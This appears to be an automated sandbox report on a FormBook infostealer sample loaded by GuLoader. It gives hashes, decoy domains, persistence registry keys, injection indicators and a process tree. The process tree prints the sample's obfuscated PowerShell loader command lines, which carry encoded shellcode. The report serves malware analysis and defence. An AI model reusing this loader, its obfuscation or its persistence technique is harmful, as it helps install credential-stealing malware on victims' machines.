formbook | cb550c56ca091b8c0d2a6634a114a66a5c15f2363881f37fbb14e715ac88134f

General

Target

NARUD_BA.exe
Size

500KB
MD5

eb4ebf5b9bbe84d8344a9d841b258b8b
SHA1

73ac005d35a2a7d5a43e4aa6982461b3168f64e6
SHA256

0b318f0cfea0808152858214548a444572aa30e11ebaf4fb5b06af00033fea7e
SHA512

bd318dd411127aa503ecce23a1d53a497be089b3b74e1b31735cbf95b52ee4858ceb6f29c0a4101740334ddbbc586a57dcd055cc31f255a121c2d06bed381c44
SSDEEP

12288:lKl9TZYH5G8FfP9Rns6cDdrnEPpmTzLJOJt:s9TybFfP9Z5WRExCJKt

Score

10^/10

formbook guloader il07 discovery downloader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

il07

Decoy

lawofficeofchasearich.com

3332626f.xyz

wordpressbilimi.net

gdapp1.xyz

facebetter.online

koningmedia.africa

elitegaraje.com

lightingnews.ru

locationdarling.com

corrective.one

contamais.app

a2dzgm-bcx9.com

gyaanji.com

ibnuic.top

fsyiq3jp.com

dizirt.com

z3iucr5b35d.net

myfedloan.africa

dscovcorpoffice.info

ht80852.com

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Formbook payload 5 IoCs

rat

resource	yara_rule
behavioral2/memory/584-84-0x0000000000400000-0x0000000000615000-memory.dmp	formbook
behavioral2/memory/584-87-0x0000000000400000-0x0000000000615000-memory.dmp	formbook
behavioral2/memory/584-94-0x0000000000400000-0x0000000000615000-memory.dmp	formbook
behavioral2/memory/2024-99-0x0000000000080000-0x00000000000AF000-memory.dmp	formbook
behavioral2/memory/2024-101-0x0000000000080000-0x00000000000AF000-memory.dmp	formbook

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1563773381-2037468142-1146002597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	help.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\9RO8KTLHENNX = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe"	help.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.Exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1563773381-2037468142-1146002597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	help.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
584	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1044	powershell.Exe
584	ieinstal.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1044 set thread context of 584	1044	powershell.Exe	29
PID 584 set thread context of 1360	584	ieinstal.exe	18
PID 584 set thread context of 1360	584	ieinstal.exe	18
PID 2024 set thread context of 1360	2024	help.exe	18

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1563773381-2037468142-1146002597-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	help.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

pid	Process
1736	powershell.Exe
1044	powershell.Exe
584	ieinstal.exe
584	ieinstal.exe
584	ieinstal.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1360	Explorer.EXE

Suspicious behavior: MapViewOfSection 9 IoCs

pid	Process
1044	powershell.Exe
584	ieinstal.exe
584	ieinstal.exe
584	ieinstal.exe
584	ieinstal.exe
2024	help.exe
2024	help.exe
2024	help.exe
2024	help.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1736	powershell.Exe
Token: SeDebugPrivilege	1044	powershell.Exe
Token: SeDebugPrivilege	584	ieinstal.exe
Token: SeShutdownPrivilege	1360	Explorer.EXE
Token: SeDebugPrivilege	2024	help.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1360	Explorer.EXE
1360	Explorer.EXE

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1360	Explorer.EXE
1360	Explorer.EXE

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 912 wrote to memory of 1736	912	NARUD_BA.exe	26
PID 912 wrote to memory of 1736	912	NARUD_BA.exe	26
PID 912 wrote to memory of 1736	912	NARUD_BA.exe	26
PID 912 wrote to memory of 1736	912	NARUD_BA.exe	26
PID 1736 wrote to memory of 1044	1736	powershell.Exe	28
PID 1736 wrote to memory of 1044	1736	powershell.Exe	28
PID 1736 wrote to memory of 1044	1736	powershell.Exe	28
PID 1736 wrote to memory of 1044	1736	powershell.Exe	28
PID 1044 wrote to memory of 584	1044	powershell.Exe	29
PID 1044 wrote to memory of 584	1044	powershell.Exe	29
PID 1044 wrote to memory of 584	1044	powershell.Exe	29
PID 1044 wrote to memory of 584	1044	powershell.Exe	29
PID 1044 wrote to memory of 584	1044	powershell.Exe	29
PID 1044 wrote to memory of 584	1044	powershell.Exe	29
PID 1044 wrote to memory of 584	1044	powershell.Exe	29
PID 1044 wrote to memory of 584	1044	powershell.Exe	29
PID 584 wrote to memory of 2024	584	ieinstal.exe	32
PID 584 wrote to memory of 2024	584	ieinstal.exe	32
PID 584 wrote to memory of 2024	584	ieinstal.exe	32
PID 584 wrote to memory of 2024	584	ieinstal.exe	32
PID 2024 wrote to memory of 1060	2024	help.exe	33
PID 2024 wrote to memory of 1060	2024	help.exe	33
PID 2024 wrote to memory of 1060	2024	help.exe	33
PID 2024 wrote to memory of 1060	2024	help.exe	33
PID 2024 wrote to memory of 1060	2024	help.exe	33

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1360
- C:\Users\Admin\AppData\Local\Temp\NARUD_BA.exe
  "C:\Users\Admin\AppData\Local\Temp\NARUD_BA.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:912
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.Exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.Exe" -windowstyle minimized $b = Get-Content 'C:\Users\Admin\AppData\Roaming\Tempereret95\Stagneredes\Fallent\Paranete\Politied\kuragens.Coa' ; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.Exe "$b"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1736
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.Exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.Exe" "<#Contaction Sprinters Talniveauers Deemphasize Empirikerens Demissionernes Inrub #>$Kabinetssekretr = """St; FF BuVenPacUltpaiBooFanco KaHtoTDiBWo Pr{ A Op U Ln PypSma SrUda BmPr( S[ TSDet OrDiioxn ng T] T`$toFPoa Ds Pe ZrKouUem FmAueTinTieSu)Ov; B A`$ UAUnbdusTatVae Ur FgRee BntetBu Pe=Ru To`$NoF Ga As UeCorBauOrmWamDeeUdn TeFo.CaLCre SnOvgLatOrhUf; P Br D Co F`$jdhBaiBll Hl ZiSon UgVe Sa= M paNSkeAcw B- ROAbb MjThesyc Rtdd TbBgy Gt BeAp[Pa]De Hd( p`$OzAAnbSps ItTae ErMag BePinRetCy Su/Ur Ta2 K)pe; u F`$ TC OaRynSeeGorAns b= U'FoS CUma' S+Ru'SyB DSHyTAsRDyIDaNMeGSt' C;Mi T Ku No NoFReoLor U(ne`$GoS OtUnu PmSkpUns V=Yn0Ud;Mi Un`$ FSSptRauBamflpKos I M-Cyl NtJa O`$ fA Sb GsEstEre DrReg Ke WnRet K;Pa E`$SaS TtMouKamFop BsGr+Hy=Gu2Ce)Sp{ P C Gr Ki F Ev C Lu An`$ bhIni DlEklsuiLan NgMg[Al`$ GSAnt Tu UmEnpBis T/ G2Th]mu Ki=Eq O[ Gc no Tn FvCheForFrtSe] B: R:UiT BoBlBIvy Ct Se P(My`$PrF Ua SsIne Rr Mumam Rm Re Fnele A.al`$InC Ka NnHaeGor HsBr.unI Dn OvSooTikPaekd(Or`$TrStetCou CmHepHasFe, S Un2Dy)Ti, B Su1 F6 e)ho; C ra W`$Tvh DiCil MlUniSpnChgRd[ H`$OvSBatBruRam Hp EsCo/ E2 S] P Ho= G Z( P`$ PhSaiValDelMaiNenRig K[ I`$KoS Mtreu lmhapSasQu/ V2Ba]fr To-TubUnx Ho ArIl G1Ny5 G3Fy)ak;Ma Ha P Mi C} T Sp[ HSCutBer JiGin SgAk] P[ MSOpyOcs Gt GePamFy. FTSiejaxNjtMi.RhE AnLac PoDidFri PnUdgUn] O:Ou: KARaSOsC NIBlI K.LyGAne FtStS Mt Rr BiUnn tg D( U`$UnhHuiRhlPrlJui Sn UgAl) S; R} F`$ItJRda So TbKr0Na=SkHDiT HB S Pe'asC SA DE V0ovE KAFyE FD RF MC UF S4OrB R7SuFDeDApFmo5HyF S5 h'In;Ag`$VeJSpaSlo Fb F1Co=tuH UTcoB t Fl'DrDGr4CaFPl0VaF AASlEmoBPrFTa6 BEVaACrFIr6EmFInFTrE FDPaB G7 ECWaEnoFat0asFLo7MiAAtASpALiBRaBZe7 AC GCDeFBj7NeEVaA AF B8 TF sF AF TCKoD C7 MFOv8SuEOvD DFet0DeEMiFsiFReCReDvl4EpFSlCReE EDTrF k1TrF V6 HFRoDImEroA A'Un;Ku`$ sJDea ToUnbMi2Mr=TeHVaT BBHu Ra'TeD FE PF tCFaEPeDLyCBo9UvEKoB BFGr6 BFFoAFoD S8UnF IDPhF RDTaESfBAnFBaC SEMaAHyE FASt'ln; X`$BoJExaPeoSob P3 C= BH TTImBOv A'FiCBeAStE S0 SENoAEsETrD FF TC FF K4StBBr7 BCSaB TE LCMoFSt7 CEVaDPhFNi0VoF T4ReFBaC MBTo7 UD M0 AF P7 RE BDMiF RC KESpB HFDe6 DE m9UnCUhA WF SCNaE RB TE TF UF I0AnF OA HF RCDiE EA RBAr7suDSl1 TF G8LoFAs7PlFEtD CFWa5VeF DCKoCBoBGrF GCHyF AFDr'Bu; R`$ScJPraSiovab H4 S= pH ETimBRa Pr'OrEGyA UE DD NE mB FFAb0 TFse7 DF SE F'Re; U`$SpJMeaUnoAtbCr5Br= IHBjT CB S li' UDFoEUdFIcC KEUdDkaDAu4 EFWo6LeFSiDafE GCSeFAc5DeFMuC KD S1BeFSh8 OFFo7boFMiD SFRo5 PF AC I' D;Af`$ UJ Sa SoCrb G6Al=DiHRiT OBRe Un' mC QBRuC BDShCFeAbuEFo9TeF RC MF BAStFSn0 PFfr8IoF f5GeDDa7 DFOp8UnFTe4 SFMeC ABtu5EsBUn9 FD C1taFTi0 KFDeDHiF PC RDPrBAcEPa0 SCPlA BFFl0CaFHuE DBSt5 KBSu9 CCSu9SpEApCHuFMaBWeF B5 SFSe0UnFBrAKv' U; S`$FoJ CaSaobibDi7We= BHBeTUsBUn Hi'PrCunBFoEDaC FFDe7 CESuDSaF P0FoFSp4 DF PC rB C5DeBzi9 ID B4pjFFo8 AFTb7blF S8 AF OE RFKoCTrFskD S' s;Mi`$ UJGeaGlo SbGr8 S=ArHmaTSuBTa Bi'FiC IBReFLiCViF AF HFFo5PhF KCTrFPrASuE TD AFSlC FFNoD FDFoDHoFClC AFNo5 KFfiCsaFOvEKoFPa8liE MD LFGrChe' U;No`$ HJGlaDao EbFi9Dw= PHBlTThBPi C'SmDKr0ReF L7 SDRe4SaF FC lF B4FeFor6 SEEmB PEVi0 FD D4 FFUn6 IFPrDAkEDyCHyFCe5 hFAnC D' s; O`$stS PkstrSmm Ms ak peMem ma F0st=ExHEsT AB H Sm' BD m4UlE U0ThD SDFoFOpCStFDo5TiFDaCPrF RE AFCy8BiEStDAmFAnC SC ADStEUn0 WE F9 gFCrCAl' S; U`$ TSTvk WrSim ks TkDre Bm UaKr1La=TiH WTUnBNe Pa'UnDMaA TFGa5MeFFi8 BE BANeEEmAStB N5 IB F9 PC S9ReE FCReFOmB NFLa5PlFSi0PaFSkA CBSk5InBPa9isCTiAtoF JCDiF r8 BFBi5 RFSkCKyF MDOrBDy5 DBRa9 PD M8SoF H7 ZE SAMeF H0bjD EA IFBi5RaFSa8udEByA LEUnA BB T5 DB U9AkDCo8 nEDdCAgE BDGuFCo6 SD fAGyFAn5 RF F8 WEimAAuE FA k' E; A`$DrSPokrer emUnsSkk HeLamAmaUn2St= sHCrTFoBfo S'MeD P0 SFTr7 FEPuF IFAn6 MF K2HaFFuCRe'No;Bo`$KaS SkChrexmEps OkLaeSmmFia F3 F=PaHPlTSaB h L' UCIm9 AEmlCSoF rB LF L5 BFPi0OpFSpAkjBOr5 tBPr9 HD f1AwFPl0 KF TDDrF SCNoD SB AETe0KmCsuAAlFDr0 KF AE sBFa5UnBTo9BaD D7 EFEsCbeEKlEAaC TAWoF W5PeFRe6OrE NDcaBFa5QuBUn9SoC EFHaF A0anEHaB UEAnD RE DCKlF S8InF S5 F'Di;Wr`$ SSFrkTarGrmgrsBekRueFimDoa C4Ox= KHegTSuB A B' BCDaFwaF P0OpEUnB TEPlDgrEOmCUdF D8CoFSy5 ADCo8KnFAt5unF B5RuF U6 AFObASt' B;Di`$AcS Ak FrMim UsUnkTreStmOpaAp5No= CHSeT pBun He' KF p7KaECoD UFTiDAlF D5daF T5An'Gy; U`$SeSAbk BrDemPlsUnk DeMym Ea H6Su=UdH ST NBTr O'BeDFi7HnEArDAlC K9ReEFoB CFBo6 VEFoDIgFUbC BFHuATuE WDSkC RFslF G0RoE MBCoEprD SENaCGsFBa8StFBe5GlD K4 DFTiCBiF P4AmF t6FiE RBBaE O0Hi'al;Va`$PeSStk Mr VmSpsHakOue Nm Vava7Im=WoH JTReBHu F'VaDGr0EnDIaCWhC u1Fy' D;Va`$ToSVek GrHimMesSpk Ie VmmeaUd8Sa=TrHKrTGwBFo Ny'SlCRe5Re'Su; S`$UnSInhChe Pe Mp ShRoe brAndFreEfrUn1Kv0 D0Ve= IHInT NBti p'noCNoCHjCStAHyD MC iCjuBCiAFaA EA OB G'Sc;Sd`$ MVReo Uw BePrl Ol FyRe=AfHEvTfeBCe Sy'CoDCoANoFSm8LdFHu5 IFLe5AeCOpEHoFph0 SFIn7 EF ODStFKa6FiE KE KCSt9 LEprB RF I6BaF FAUdDHe8Pu'El;BafGnu enBecUltOpiTioBenTa FofKnkEnp E Hu{CaPInaLirMia TmUd R(Mi`$ SC Fh AaLe2Gu2An3Ra,an i`$ BtAea RnEvnBliTas Ph S) E L V S hj Br; M`$noUmanDed SiNafIsfKne DrGaeFrnBet dlSaySt0 R A=ReHAlTSyB f Em' JB SDXeCDiC OFKl7 mFCoF KF K8AfFOb0TaF N5PaFTr0 IF M7CoFCoEGaBDi9roALi4LoBSu9BaBLo1BiC P2BrDPo8DeETi9UlE G9 MD JD RFFa6TeF D4 hFFi8 LFSt0FaFUn7TeC l4 EABa3PiATy3 HDEkAOlEFrCSkEriB VE SBNuF CCSkFCe7kaEAnDSlDSaD PFBe6NoF l4BoFti8 IFFa0BrFBl7 JBMe7 DD RESeF ICDaE BD PDRa8 EEBeA SE HA SFBeC BF T4LkF SBstF N5MeF A0MiF FC REPoA UB V1 FB D0LeB R9JeESp5WiB D9AnC FEsoFba1PrF PC JE KB EFPhCElBFr4PoDCo6InF WB DFDe3 HFFoCJoFChAAgEAdD OB W9BeE S2SiB H9 YB ADHjCSj6DiBFo7 ADUnEChF P5 bF I6 MFUdBTrFSt8 FF S5BeDVo8NoEReALdE DA VFPsCTeF D4 EF GBbiF S5VaE M0MaDjoABoFDe8VaF CABlFCe1 SF FCSiB T9unBAf4CiDEp8 UF P7DiFSnD PB R9GuB BDBrCNo6 cBSk7 CDPr5FuFVa6 HFChAUaFEx8CaEInDLyF A0JoF D6 bFMa7FuB N7AdC PADaE G9 HFHa5 OFCa0MuE RDAlB F1 lBsaDUpCPrA CFWh2KaE DB AF E4VaEPoA IFOv2NoF CCtjFBi4MaF D8 RA O1MeB S0 FCNi2 SBNi4AcA P8DaC P4ReBCe7 LD ECOgENo8ReE HCMeFug8 SFBr5 PE SA RBBu1FdB MDPoD I3DiF T8 WFNo6UdFFoB BACo9GaBOu0 BBFo9 YEpa4 VB I0GeB H7 WD KE RFUoCBlELyD bCDeDAfE J0 SE I9 CFTiC ABEm1EpBKlDFuDsc3 DF l8 cF C6AmFbyBFuAOp8 MBFo0Le'Mr; F&pr( S`$HeS Pk FrPam Oselk DevimBuaDu7Sa) F U`$HoU Mn TdFli Gf IfBieAur De FnFut Rl DyTy0Ja;Un`$DaUAinModEfiTofSufRdeSarRee VnSatInlNoy s5At Ba= r AHAlTDeBUd po' SBMaDbeD UB KEimBDoFUlC SFRo4 SE mAGiFBrCFoEUrBFeF WC UF L7HyB U9 HA R4 ABSp9BoB RD FCThCSkFTa7 VF TFMeFKa8AlFDr0ChF N5OrFUn0IlFba7 TFTrE SBLs7KrDPaEVaFGrC CESkDveDId4 HF uC FE ADBiFMo1 HFMe6DiFAfDDaB D1DiB NDFyDKn3KaF P8 GF S6 RFQuBDiA VBMoBTa5SmB P9AbC W2 GCRaDthE F0FlEDa9KlFunC MC B2PaCFi4OeCPr4 MBEk9 BD F9 OBSl1OpB IDPaDBo3 SF A8HeFSk6 HF UB AA NASuBEk5 OB F9 SBLuDPiD T3 SF F8LoF E6 SFprBOpA SD TBtr0ExB A0 H'St;Un& R( F`$CoSUvkTrrFrm BsMek reSkm MaHy7 B) G fu`$SuUnenVidBri Sf gfnoeKurBleEmnSatSnlTay V5Pl; s`$ClUCon IdUniPaf AfUee BrUne BnMat ulReyCo1 K St=Br SHOpTPaBAa Re'FoEReB CFHeC OEMaDScE tCCoEErBTrFPa7 EBEv9 SBBrD SD bB AE AB JF RCSmF C4crEUdADrF LCSpE TBFaFMiC TF U7 JB N7 RD C0AfF H7DoE CF YF K6 HF L2MeFSkCScBAg1PsB BDNeFUn7 DEinC KF S5BrF M5FaBph5 sBSu9ByDRa9UhB c1DiCca2laCDaAsoE P0PoE uA LE KDoxF BC SFRe4CaB F7 LC tBOvE FC RFUn7 BEHeDSkFLy0SaF K4GiFheCDiBSt7CoD p0 pFSp7SeEQuDOpFEaC SERvBKoFNo6 PE T9PlC dAUdF KC UEWoB VEMaF OFSi0scF DADrFmiCBeEStAVeBKo7neD S1 FFIn8 BFBo7 TFReD sF S5 RF FCFrCHyBAmFAuCLgFClF KC F4 oB E1 IDRi7StF NCPaE SE SBSu4 AD E6 UF CBEsF v3 MFSkCPoF FASqE DD SBCa9 FCFyASeE P0zoEkoA AEHvD KFDgCFoF D4BrBsu7CaCThB dEOpCEgF b7 BE PD SFli0PoFJo4 HFEnC TBDa7EnDZs0 KF S7UrEStDCuFemC METiB TF S6 REan9SuC LAPlFSjC GECrBEpEUnFAbF T0 TF FAKlFRoCOvEvaABeB F7 RDPi1SaFPa8TaFIn7ToF LD PFno5noFHaCTyCSaB RFLoCFrFslF ABFe1 EB m1 BDSt7SeF SCFoE VEJoBKa4 fD K6GaF dB cFHe3feFSmC CFThABeESlDKaB k9KiD G0 CFUn7 cEWoD AC F9OdE HD FEMoBOdBSt0 BB S5ReBOp9OcB B1SeBTaDTrCCaC OF K7 NFSlFUnFSa8 SFne0HeF d5OvF J0 MFov7coFtoEOvBCh7BiDUlEAnFfoCKlEByDReDSp4 SFSuCApEDaDDrFHr1 DFCo6 HFFuDAlBJa1 UBinDAkDUs3 sF U8 DFba6 RFPoBDiADoCPlB M0ArB R0 TB T7 PD R0AlF F7 BE RFReFas6BoFEv2diF NCKiBKo1 DB BD SFUn7LiEDiC RFIn5LvF P5EtB A5TeB T9HaDOb9KuBUd1 ABBlDAnDMeA ZFTo1TeFTo8AsA AB pAGrB TA nA CBLa0PhB A0ApB C0SlBHa0 VBAl5hnB U9MoBExDSlEOzDDeF T8frFEm7HeF S7asFco0FiESoADoFLi1SiB P0BgBBi0 b' S;Ey&Gr(Ru`$CeS WkCor Sm Ps BkPheVam LaKl7Sk)Ha Un`$NoUEnnfldmaiTrfSpfBee OreneornPot SlDyyBo1 S; U} Cf Au Un Uc FtCoiUno UnPr OG VDImTBo Cl{ PPRha MrAfaPem L Me( F[ MPReaPhrAna UmFleget Ue CrHe(DePFloTus Mi ctRoi Io bn H T=Up Un0Te, D FiMBiaStn BdmaaWitTpoberPeySt P= P Un`$SeT HrReucueRm) U]Ha v[MoTBry gp PeDe[ E]Br] F In`$SiCFuoMoiMigLanDie sdHa,Vi[ SP RaTorPeaHjmVoeAltGge MrCa(PaPSqoDes ViFot Ni VoGnnMe F= G P1Sl)No]Si eu[ChTFoyExp SeGu]Fa Qu`$DuLdeewad TtScoGag Se Ft fsTo Te= C R[ OVFio ei MdFl]Sp)De;Un`$SaUPen Bd HiSlf Ef ie Kr Re CnLet Bl By D2On P= F InH KTSpB S Kr'ThB MD AC RAMoEDoDKaE OB FFBuC LFPr8coFIv2UpFBe0InF R5SlEPa0CaB S9 mA S4kaB P9 ACDe2ZoD L8MaE M9LuESh9AlD LDLoFSe6 RF K4TfFTa8 VFSa0SkFVi7GoC O4avAGe3 DA U3 JD PA dEKjCBoECoBudETrBPrFUnCAuFKo7PuEkeDEnDBiDPlFBe6 AF N4VaF B8MeFGe0 HFTa7 DBSa7CoDHaD MFTeC MF AF SFtr0GuFIn7HiF SCBsD gD DE A0SkFUd7miFBl8FoFVg4FjFPe0BlF kA SDFl8SaEGuA FE SAEfF FCAnFRh4HaF MB BFSt5teERa0 RB S1StBFu1 SDBa7ddF FCSpEEnE dB Y4HrDEn6 FFMaB SFAr3 LFsuCDaFpeA TE DDViB T9UnC IA PE E0RvE OAmeEMoDNoFInC AF A4FoBwi7 mCBiBHiF KCEqFLjF HF S5 MFTaCViFChAEkEDoDByFRe0ReFCi6SiFCh7 GBMa7 RDAr8reE RA bEHaA KF mCViFNe4InF MBHiFFr5 SE F0 TDHy7WeFOu8olFAf4 FFSyCVaBHe1TuBMoD AD e3CiFFl8RoFki6MaF SB LADe1ArBAk0HyB C0RiBMi5SaBCi9DiCIn2 ACFuAmoEPo0 DE LA BE UDTiF MC EFhn4 HBCy7RoC BBRoFkaCFyF AF pFBo5 LFFaCUnF PABuESkDUnFAf0 dFSk6DeF L7 PBPa7 DD TC AF A4KyFAr0 PENoDBrBin7geDRe8ExEcaAnoE OALiFShCAlF E4 TFAlB SFTh5 UE K0AmD RBOpESeC kFdi0FjFVe5CaFStD HF EC QEalBDeD H8PrFOvA SF UALiFEsC SEStA SE IA oCRa4 SASa3 NAKo3 FCstBDiE EC RFfo7ToBHe0SiBFr7PoDBlDSlFGeC KFJoFPrF V0 SFTo7 KF FCFoDHeDflEHu0AfF I7 SFep8FiFIl4 EF D0AdFNoADeDXa4 UFEv6 VFDrDFoE NCUnF V5SeFskCFoB S1 FBPlDShDSa3 CFAe8 FF R6KoFDiB TASk0NaB G5ReB P9DaBGoDUdFUnFGdFEg8VaFAg5OeEobAToFMiC GB M0 gBDe7 cDglDTeFDeC SFHeFUnF B0 BF F7PaFKiC kCbeDSaE d0ClE R9 DF WCMuB S1 sB MD LC HA HFPe2GeE PBKoFFa4TiEUnATrFKa2 LF CCCuF B4 bF s8foA S9InBSt5TiB B9 SBBeDPoC AAKaF F2BaEStB AFFr4 EEInA DFUn2FiF KCChFUn4MiFPh8ElASe8AcB S5 BBDe9 EC T2 PCOvA LELs0PrECoAFoEOdDRaFMeCTrF G4 MBMi7CoD M4 IEBuCSnF S5ElE FDPeF V0 DF GA BFDo8RiEAiA EETiD TD TDDeFUnCPeFUn5OpF nC IF HEpeFAr8OmE SD PF ACVeC C4 nBFu0Da'Un;Ar&Ta(Si`$OpSHvkRerNomNesOrkSte Bm PaBr7In) I G`$SpURon Sd RiStf Sf VeUnrJueJonLytDelMoySh2On;Sy`$SmUDenAadToiApf MfRae SrPleOun BtEpldey H3Fi Om=Fr EoH UTFiB G Fl' tB ADTrC UAPrEPiD mEViBCoFPeCBuF S8HoF B2 LFSl0SnFNe5BiE c0 OB e7DiDDoDbeFPsCafFHuF NFPa0MaFDo7 CF ACViDMeA HF v6VrF I7ApE SATeEOtDBeEUnB WEDeC UF VA AE PDBaF F6DiEuhBMeBMa1 FBCaD SD F3 kF B8HdF A6 IFCaB DAKoF RBEg5 lBHy9TjCDo2BeCliA IE L0NeETrA SE NDInFHuC CF U4UnB F7GyC AB SF BC RFViFNyFDo5StF PCReFAcAprE BD GFHi0 JFin6OpF B7PsB p7PaDDdALaF S8 DF S5 HF F5 OFVi0CaF S7 FF pE MDTrAPsF k6FoFKa7FeEBuFMaF AC uFAl7slEUnDReFNa0 uF H6 MFLa7 LEVeA NCfi4 CA M3 SASl3PoCGiA VEFrD PF H8 IFSi7SaF CDtrFRe8 BE CB FFFuD SBop5AnB S9AcB DDLuDPaA SF B6 FFUn0FoF RE TFFl7UdFMoC LF FD aB B0PrBRe7 WCApA IFStCVeESnDSeDMa0InFDa4 BEKn9CiF T5 FFNoCOpF B4RaFUdCShF U7KuEFoD PF M8 MEShDpeFCr0 SF N6FiFIn7 KDHaFUnFAp5 RFAn8SoF TECoEKnAPoB U1UdBFoDNeDSk3ScFCl8 VF G6DiF AB AAGaEPrB B0 c'De; D& R(Bo`$ GSPek Kr bmFlsUnkEteSkm Ta B7Ba) R U`$eqUManAkdRui sfSpfUteWorVie sn TtSll Ky S3 U; S`$ NUShnRedVri Hf If SeBorSke DnintDrlRyyOr4 A Br=mo LH MT RB F C'fuBQuD SCHeAAfE LDFrE BBHeF RC TFPu8 DF E2 BF M0StF A5 NEGa0DeBTu7 FDKoD PF TC IF AFClFEu0 IF P7LrFUdCUnDAn4 RF PCUkELaDMoF T1KaF S6GaFFuDGlB U1 PBNoD rCOmAAtFFo2WaE SBApFFo4 DEInA LFOb2HyFReCmaFUn4MoF D8 AAChB kBUn5 SBKa9BnB PDVaCPlAAnFAn2 HELuBBiF C4PhE EA CF H2 FFPeCKaFLu4 EF S8 CAStA GB U5FaB I9KoBCyD RD A5EfFSeCPaFDeD dEGgDLgFSt6PeFPrEGiFUnCRrE DDPrE MA RB S5 NBDr9PeB ADFeD OAStFDo6 CF H0 RFElESuF F7 UF GCJoFKpDArB G0 CB P7 BCMaAInFSpCMoE DD sDMa0 VFUd4CoELi9peFSv5PeF SCUnF D4 SFAfC MFUn7UnEMbDtrFTa8UnETrDElF V0 IFAr6DeF T7 EDFyF EF R5 KF T8HaFJuEMgEVeA MBSu1 RBAnDunD F3ReFfr8 BFUn6DrF GBAnAErE ABRi0 K'Sy; H&Ek(Re`$BlSSukOvrSpmPosfrk Beinm SaFa7 U) D Ko`$TrUcon AdNiiFlfIkfoveTorNaeTanFotUnl VyFo4Sa;St`$ TU KnUmdAliMefVifImeCurHae sn Atcal SyPr5Ka R= s KH DT OBFo Op' AELeBMeFRoC GEcaD OEUgCauEScB aF G7VlBPu9GrBRiDEuC RAUdEIdDEtE CBFlF UC SF a8SmFSp2 lFFe0KnFOf5laEPr0HeB k7FuDRhA NEBuBGaF KC TF H8ExEHeDCeFBrCLiCJuD AEKo0 REPr9 tFBrC FB K1 KB C0 T' V;Pr&Ji(Bu`$ ASTik SrUdmHas Mk HeDamAnaFo7Bo)Bl Ti`$SuUOxnStd WiVifKafGeePor feOcn TtCalMiyUd5va ek H N;Sc} U`$KnWHeofor VtSr I=Co JHFoT JBOv S'LoF M2AvF FC eE SB YFSu7AnF BC wF S5 MAFoA DAInB A'Hl; T`$Ids OkSkaElr Kn Ds SuGrn LgIceUnnMi P=Re DHMoTatBEl P'FoETiC REPeAOpFInCacEDiB DATrAHyABoBOp' V;Cr`$DeTAtrEua acrok Is Yu UiSatAt0Da3Mo Ph=Di BaHBoTMaB B Sk'VgDAlEBrF DCReEDaD ADPrA OF A6 LF F7 PEArASnFLe6UdFRe5 MFMeCcoCRaECaF I0 PF R7 nFSaD SF O6InEPeEAf'Mi; m`$UdTMirRda Pc dkChs SuOmi FtKa0 P0 M=BlHSiTsuBAf Mi' MCLaAPoF B1 PFCo6BrEHuE 